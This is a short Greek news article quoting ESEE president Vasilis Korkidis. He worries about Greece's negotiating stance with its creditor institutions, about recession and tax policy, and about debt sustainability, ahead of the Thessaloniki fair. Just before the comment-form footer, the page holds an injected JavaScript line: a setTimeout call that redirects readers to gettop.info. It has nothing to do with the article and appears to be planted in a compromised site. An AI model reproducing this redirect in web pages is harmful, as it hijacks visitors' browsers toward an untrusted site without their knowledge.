Κορκίδης: Ο χρόνος για την ελληνική αγορά μετρά αντίστροφα

0
5

 

 

Την αγωνία του για τη στάση που θα κρατήσει η χώρα στην επικείμενη διαπραγμάτευση με τους θεσμούς, εξέφρασε ο πρόεδρος της ΕΣΕΕ Βασίλης Κορκίδης μιλώντας εν όψει της ΔΕΘ.

«Ιδιαίτερα αγωνιούμε να μάθουμε ποια θα είναι η στάση της χώρας στην επικείμενη διαπραγμάτευση με τους θεσμούς, πώς θα ξεκολλήσουμε από την ύφεση και την ανεξέλεγκτη φορο-κεντρική πολιτική, καθώς και πότε θα συζητηθεί το θέμα της βιωσιμότητας του χρέους, γεγονός που θα καθορίσει τον οικονομικό-πολιτικό προσανατολισμό της χώρας μας στο μέλλον», ανέφερε.

Ο κ. Κορκίδης σημείωσε ότι ο χρόνος για την ελληνική αγορά μετρά αντίστροφα και εξέφρασε την ελπίδα οι προτάσεις των φορέων της μικρομεσαίας επιχειρηματικότητας να εισακουστούν και να συμπεριληφθούν στους σχεδιασμούς και στις επικείμενες υλοποιήσεις.

«Θέλουμε να πιστέψουμε ότι το ασφυκτικό πλαίσιο των περασμένων ετών θα αρχίσει σταδιακά να χαλαρώνει και ότι θα καταφέρουμε σύντομα να βρεθούμε σε συνθήκες, όπου η ανάκαμψη δεν θα φαντάζει μία μακρινή προοπτική. Δεν ξέρουμε ωστόσο αν μπορούμε», κατέληξε.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here